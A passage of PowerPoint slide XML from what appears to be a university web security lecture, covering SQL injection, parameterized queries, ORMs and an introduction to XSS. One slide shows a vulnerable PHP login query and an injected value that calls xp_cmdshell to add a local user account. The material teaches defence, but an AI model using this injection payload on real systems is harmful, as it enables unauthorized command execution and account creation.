              <a:rPr lang="en-US" altLang="en-US" sz="23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xp_cmdshell { 'command_string' } [ , no_output ]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2300" b="1">
              <a:solidFill>
                <a:srgbClr val="CB297B"/>
              </a:solidFill>
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="4550"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" i="1"/>
              <a:t>“Spawns a Windows command shell and passes in a string for execution. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" i="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" i="1"/>
              <a:t>Any output is returned as rows of text.”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="220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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89D8F893-A6C5-1893-A8BD-EBFA7E740105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Escaping Database Server </a:t>
            </a:r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685AA4DB-5938-240B-00A4-8BB010BA5609}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844550" y="1756569"/>
            <a:ext cx="10867232" cy="4540250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="404019">
              <a:spcBef>
                <a:spcPts val="350"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2050">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>$u = $_POST['login']; //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2050" b="1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2050" b="1">
                <a:solidFill>
                  <a:srgbClr val="B516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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2050" b="1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; exec xp_cmdshell 'net user add usr pwd'--</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="205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 defTabSz="404019">
              <a:spcBef>
                <a:spcPts val="350"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2050">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>$pp = $_POST['password']; // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="205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123</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="205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 defTabSz="404019">
              <a:spcBef>
                <a:spcPts val="350"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="205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 defTabSz="404019">
              <a:spcBef>
                <a:spcPts val="350"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2050">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>$sql = "SELECT id FROM users WHERE uid = '$u' AND pwd = '$p'”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="404019">
              <a:spcBef>
                <a:spcPts val="350"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="205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//     "SELECT id FROM users WHERE uid = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2050" b="1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';</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2050" b="1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</a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2050" b="1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   exec xp_cmdshell 'net user add usr pwd123'-- "</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2050">
              <a:solidFill>
                <a:srgbClr val="004D80"/>
              </a:solidFill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 defTabSz="404019">
              <a:spcBef>
                <a:spcPts val="350"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2050" b="1">
              <a:solidFill>
                <a:srgbClr val="004D80"/>
              </a:solidFill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 defTabSz="404019">
              <a:spcBef>
                <a:spcPts val="350"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2050">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>$rs = $db-&gt;executeQuery($sql);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="404019">
              <a:spcBef>
                <a:spcPts val="350"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2050" b="1">
                <a:solidFill>
                  <a:srgbClr val="0171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// No Error…(and with a resulting local system account) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="404019">
              <a:spcBef>
                <a:spcPts val="350"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="205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if $rs.count &gt; 0 {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="404019">
              <a:spcBef>
                <a:spcPts val="350"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="205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// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2050" b="1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Success!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="205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</a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="205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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C755DEC-B08B-FF35-04FA-ABC79EEDA674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Preventing SQL Injection</a:t>
            </a:r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8FE32F2F-6C45-245E-1535-D35A30B92551}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844550" y="1756569"/>
            <a:ext cx="10502900" cy="3521075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-127000">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="B51600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Never trust user input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" i="1"/>
              <a:t>particularly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t> when constructing a command)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-127000">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>     Never manually build SQL commands yourself!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-127000">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>There are tools for safely passing user input to databases:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-127000">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Parameterized (AKA Prepared) SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-127000">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>ORM (Object Relational Mapper) -&gt; uses Prepared SQL internally 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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B12EC4DF-C742-E807-77CC-A6CB53617484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Parameterized SQL</a:t>
            </a:r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63EF1BE2-E26A-3E21-6C33-51C208AC044D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844550" y="1756569"/>
            <a:ext cx="10911682" cy="4046538"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="400050">
              <a:spcBef>
                <a:spcPts val="2850"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300"/>
              <a:t>Parameterized SQL allows you to send query and arguments separately to server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="400050">
              <a:spcBef>
                <a:spcPts val="2800"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>sql = “INSERT INTO users(name, email) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="17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VALUES(?,?)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="1700">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>cursor.execute(sql, [‘bob’, ‘bob@hkust.edu.hk'])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="400050">
              <a:spcBef>
                <a:spcPts val="2800"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>sql = "SELECT * FROM users WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="17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email = ?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="1700">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>cursor.execute(sql, [‘alice@hkust.edu.hk'])</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="17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  <a:sym typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="17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  <a:sym typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="400050">
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300" b="1"/>
              <a:t>Benefit 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300"/>
              <a:t>No need to escape untrusted data — server handles behind the scenes </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2300" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="400050">
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300" b="1"/>
              <a:t>Benefit 2: P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300"/>
              <a:t>arameterized queries are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300" i="1" u="sng"/>
              <a:t>faster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300"/>
              <a:t> because server caches query plan</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92163" name="Line 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F432029E-3DC5-273D-93BC-185570A7A9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80263" y="3213100"/>
            <a:ext cx="1785938" cy="434975"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="0171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 sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92164" name="Text Box 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6E5E1FD-0B56-96B2-0B75-E3F37057B5A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9244807" y="2675214"/>
            <a:ext cx="3146425" cy="813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25400" tIns="25400" rIns="25400" bIns="25400" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr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 eaLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1650" b="0">
                <a:solidFill>
                  <a:srgbClr val="017100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Values are sent to server </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="1650" b="0">
                <a:solidFill>
                  <a:srgbClr val="017100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</a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1650" b="0">
                <a:solidFill>
                  <a:srgbClr val="017100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separately from command. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="1650" b="0">
                <a:solidFill>
                  <a:srgbClr val="017100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</a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1650" b="0">
                <a:solidFill>
                  <a:srgbClr val="017100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Library doesn’t need to escape</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92165" name="Line 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5ECFDAE4-283B-22A9-FD78-8D4491236E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263732" y="2721769"/>
            <a:ext cx="681038" cy="232569"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="0171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 sz="90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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9459BF7B-B28E-C27E-18CA-316264CFA909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Object Relational Mappers </a:t>
            </a:r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8E217098-5E6C-73C8-81B7-3E19D7026734}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844550" y="1756569"/>
            <a:ext cx="10502900" cy="4294981"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="400050">
              <a:spcBef>
                <a:spcPts val="2850"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300"/>
              <a:t>Object Relational Mappers (ORM) provide an interface between native objects and relational databases. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="400050">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1450"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="400050">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="55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 defTabSz="400050">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" b="1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class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1900" b="1">
                <a:solidFill>
                  <a:srgbClr val="0433FF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User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(DBObject):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="400050">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="95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 defTabSz="400050">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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    __id__ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="19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=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 Column(Integer, primary_key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="19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=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" b="1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True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)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="400050">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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    name   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="19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=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 Column(String(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="19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255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))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="400050">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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    email  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="19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=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 Column(String(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="19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255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), unique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="19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=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" b="1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True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)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="400050">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="19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 defTabSz="400050">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" b="1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if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1900">
                <a:solidFill>
                  <a:srgbClr val="22288F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__name__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19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==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1900">
                <a:solidFill>
                  <a:srgbClr val="C8352B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"__main__"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:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="400050">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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    users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="19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=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 User</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="19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.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query(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="C8352B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email='zakird@hkust.edu.hk'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).all()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="400050">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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    session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="19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.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add(User(email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="19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=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="C8352B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‘bob@hkust.edu.hk'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, name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="19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=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="C8352B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‘bob'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))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="400050">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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    session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="19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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>commit()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B51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">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16A504E5-2805-1C27-6692-A36D7D320114}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="889000" y="2266950"/>
            <a:ext cx="10414000" cy="2324100"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="362744" eaLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="7450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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Cross Site Scripting</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="7450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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</a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="7450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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(XSS)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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F51C6E65-C30F-4639-9325-255E82800366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296863"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="465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OWASP Ten Most Critical Web Security Risks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63490" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{537C87EE-3589-B813-C385-57D511DF1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5" y="1516857"/>
            <a:ext cx="9043194" cy="4874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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4E973E2-684B-9365-2622-EEC74C5C226A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Cross Site Scripting (XSS)</a:t>
            </a:r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587B422E-4761-6C67-1D01-7860FA738045}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844550" y="1756569"/>
            <a:ext cx="10502900" cy="1256506"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1"/>
              <a:t>Cross Site Scripting: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Attack occurs when application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>takes untrusted data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>and sends it to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>web browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>without proper validation or sanitization.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" b="1"/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000B303F-7169-94B6-03CF-D895C2C6E538}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1624807" y="3448844"/>
            <a:ext cx="4044950" cy="2039938"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
